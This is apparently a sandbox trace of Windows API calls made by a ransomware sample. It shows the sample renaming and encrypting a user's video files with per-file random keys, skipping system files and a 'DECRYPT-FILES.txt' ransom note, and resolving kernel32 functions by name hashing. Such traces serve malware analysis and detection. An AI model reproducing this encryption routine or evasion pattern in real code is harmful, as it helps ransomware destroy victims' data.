[0087.304] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.305] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.305] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.305] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ajO4XvEv4yYsIs837v.swf") returned 76 [0087.305] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ajO4XvEv4yYsIs837v.swf.TtDMtPo") returned 84 [0087.305] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ajO4XvEv4yYsIs837v.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ajo4xvev4yysis837v.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ajO4XvEv4yYsIs837v.swf.TtDMtPo" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ajo4xvev4yysis837v.swf.ttdmtpo"), dwFlags=0x0) returned 1 [0087.305] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.306] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.306] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.306] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe21e0360, ftCreationTime.dwHighDateTime=0x1d4d0db, ftLastAccessTime.dwLowDateTime=0xbcfd6600, ftLastAccessTime.dwHighDateTime=0x1d4cba6, ftLastWriteTime.dwLowDateTime=0xbcfd6600, ftLastWriteTime.dwHighDateTime=0x1d4cba6, nFileSizeHigh=0x0, nFileSizeLow=0x18878, dwReserved0=0x0, dwReserved1=0x0, cFileName="BQQtijYG2l71UpFZBjuL.flv", cAlternateFileName="BQQTIJ~1.FLV")) returned 1 [0087.306] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv", lpString2="DECRYPT-FILES.txt") returned -1 [0087.306] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv", lpString2="autorun.inf") returned 1 [0087.306] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv", lpString2="boot.ini") returned 1 [0087.306] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv", lpString2="desktop.ini") returned -1 [0087.306] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv", lpString2="ntuser.dat") returned -1 [0087.306] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv", lpString2="iconcache.db") returned -1 [0087.306] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv", lpString2="bootsect.bak") returned 1 [0087.306] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv", lpString2="ntuser.dat.log") returned -1 [0087.306] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv", lpString2="thumbs.db") returned -1 [0087.306] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv", lpString2="Bootfont.bin") returned 1 [0087.306] lstrlenW (lpString="BQQtijYG2l71UpFZBjuL.flv") returned 24 [0087.307] lstrcmpiW (lpString1="flv", lpString2="lnk") returned -1 [0087.307] lstrcmpiW (lpString1="flv", lpString2="exe") returned 1 [0087.307] lstrcmpiW (lpString1="flv", lpString2="sys") returned -1 [0087.307] lstrcmpiW (lpString1="flv", lpString2="dll") returned 1 [0087.307] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.307] lstrlenW (lpString="BQQtijYG2l71UpFZBjuL.flv") returned 24 [0087.307] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.307] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="BQQtijYG2l71UpFZBjuL.flv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\BQQtijYG2l71UpFZBjuL.flv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\BQQtijYG2l71UpFZBjuL.flv" [0087.307] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.307] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\BQQtijYG2l71UpFZBjuL.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\bqqtijyg2l71upfzbjul.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.307] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=100472) returned 1 [0087.307] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.307] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.307] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.308] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.308] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.308] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.308] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0087.310] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.310] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.311] CloseHandle (hObject=0x42c) returned 1 [0087.311] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.311] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.312] CloseHandle (hObject=0x0) returned 0 [0087.312] CloseHandle (hObject=0x428) returned 1 [0087.312] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.312] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.313] GetTickCount () returned 0x114e466 [0087.313] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.313] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.313] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.313] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.313] lstrlenA (lpString="kernel32.dll") returned 12 [0087.313] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.314] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.314] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.314] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.314] lstrlenA (lpString="ADDATOMA") returned 8 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.314] lstrlenA (lpString="ADDATOMW") returned 8 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.314] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.314] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.314] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.314] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.314] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.314] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.314] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.314] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.314] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.314] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.314] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.314] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.314] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.315] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.315] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.315] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.315] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.315] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.315] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.315] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.315] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.315] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.315] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.315] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.315] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.315] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.315] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.315] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.315] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.315] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.315] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.315] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.316] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.316] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.316] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.316] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.316] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.316] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.316] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.316] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.316] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.316] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.316] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.316] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.316] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.316] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.316] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.316] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.316] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.316] lstrlenA (lpString="BEEP") returned 4 [0087.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.317] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.317] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.317] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.317] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.317] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.317] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.317] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.317] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.317] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.317] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.317] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.317] lstrlenA (lpString="CANCELIO") returned 8 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.317] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.317] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.317] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.317] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.317] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.317] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.318] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.318] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.318] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.318] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.318] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.318] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.318] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.318] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" 